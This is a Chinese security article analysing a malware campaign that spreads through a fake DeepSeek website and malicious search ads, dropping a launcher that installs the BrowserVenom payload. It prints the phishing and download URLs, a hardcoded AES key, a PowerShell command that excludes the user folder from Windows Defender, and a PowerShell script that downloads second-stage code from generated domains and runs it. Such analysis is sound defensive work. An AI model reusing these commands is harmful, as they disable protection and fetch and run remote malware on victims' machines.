当前位置：网站首页 > 技术文章 > 正文

重定向流量通道窃取数据!拥有完美的伪装和传播渠道

网站名称：重定向流量通道窃取数据!拥有完美的伪装和传播渠道
网站分类：技术文章
收录时间：2025-07-27 15:14
网站地址：

“重定向流量通道窃取数据!拥有完美的伪装和传播渠道” 网站介绍

将二进制空间安全设为"星标"

第一时间收到文章更新

钓鱼诱饵

感染的源头来自一个钓鱼网站: https://deepseek-platform.com , 攻击通过恶意广告传播, 这些广告被故意投放为用户搜索"deepseek r1"时的首条结果, 从而利用该模型的流行度。一旦用户访问该网站，系统会进行检测以识别受害者的操作系统。如果用户使用的是 Windows 系统，页面上只会显示一个可点击的按钮：“立即试用”（Try now）。如图:

点击该按钮后，用户将被引导至一个用于验证是否为机器人的 CAPTCHA 页面。该页面的代码是混淆处理过的 JavaScript，用于执行一系列检查，以确保用户不是自动化程序。在成功通过 CAPTCHA 验证后，用户会被重定向至 proxy1.php 路径的页面，并看到一个“立即下载”（Download now）按钮。点击该按钮将会下载一个名为 AI_Launcher_1.21.exe的恶意安装程序，下载链接如下：

https://r1deepseek-ai.com/gg/cc/AI_Launcher_1.21.exe

恶意安装程序

恶意安装程序 AI_Launcher_1.21.exe 是下一阶段恶意软件的启动器。一旦这个二进制文件被执行，它将打开一个模仿 Cloudflare 验证的窗口, 如下图:

这是一个从 https://casoredkff.pro/captcha 加载的另一个假验证码, 勾选复选框后, URL后面会追加: /success, 用户将看到以下界面, 提供下载和安装Ollama和LM studio的选项,如图:

点击任一"安装"按钮会下载并执行相应的安装程序, 但有一个关键点: 同时还会运行另一个函数: `MLInstaller.Runner.Run()` , 该函数会触发植入程序中具有感染性的部分。

private async void lmBtn_Click(object sender, EventArgs e){try{MainFrm.<>c__DisplayClass5_0 CSlt;>8__locals1 = new MainFrm.<>c__DisplayClass5_0();this.lmBtn.Text = "Downloading..";this.lmBtn.Enabled = false;Action action;if ((action = MainFrm.<>O.<0>__Run) == null){action = (MainFrm.<>O.<0>__Run = new Action(Runner.Run));  # <--- malware initialization}Task.Run(action);CSlt;>8__locals1.ollamaPath = Path.Combine(Path.GetTempPath(), "LM-Studio-0.3.9-6-x64.exe");[...]

当函数MLInstaller.Runner.Run()在受害机器上以独立线程执行时，感染过程会按以下三个步骤展开：

第一步: 规避 Windows Defender 检测

恶意函数首先尝试将用户文件夹从 Windows Defender 的保护中排除。为此，它使用 AES 加密算法对一个缓冲区进行解密。AES 加密信息（如密钥和初始化向量）是硬编码在植入程序中的, AES信息如下:

Type 类型	AES-256-CBC
Key键	01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20
IV	01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10

解密后的缓冲区包含一条 PowerShell 命令，该命令由恶意函数调用并执行，用于将用户文件夹加入 Defender 排除列表。该命令如下:

powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $USERPROFILE

命令参数含义如下:

-inputformat none : 不从标准输入接受格式化输入（通常用于脚本自动执行）

-outputformat none : 不使用格式化输出（防止格式化干扰解析）

-NonInteractive : 非交互模式，不弹出窗口或等待用户操作

-ExecutionPolicy Bypass : 绕过 PowerShell 脚本执行策略限制（可执行任意脚本）

-Command : 后跟要执行的 PowerShell 命令

Add-MpPreference -ExclusionPath $USERPROFILE : 执行 PowerShell 命令，将用户目录添加为 Defender 的排除路径

第二步: 下载并执行第二阶段组件

随后，恶意函数会执行另一条 PowerShell 命令，从一个恶意域名下载可执行文件。该域名是通过简单的域名生成算法（DGA）推导得出的。下载的文件被保存为： %USERPROFILE%\Music\1.exe , 下载完成后立即被执行。相关代码如下:

$ap = "/api/getFile?fn=lai.exe";$b = $null;foreach($i in 0..1000000) {    $s = if ($i - gt 0)  {        $i    } else {        ""    };    $d = "https://app-updater$s.app$ap";    $b = (New - Object Net.WebClient).DownloadData($d);    if ($b)  {        break    }
};if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion()  - match"^v2")  {    [IO.File]::WriteAllBytes("$env:USERPROFILE\Music\1.exe", $b);    Start - Process "$env:USERPROFILE\Music\1.exe"  - NoNewWindow} else {    ([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)}

第三步: 加载并执行第二阶段有效载荷（BrowserVenom）

接下来，MLInstaller.Runner.Run()函数会从恶意安装器缓冲区中的 ConfigFiles.load 类和变量中提取一个硬编码的第二阶段Payload。此可执行文件使用与前面相同的 AES 算法解密, 解密后的程序会被加载到内存中并立即运行。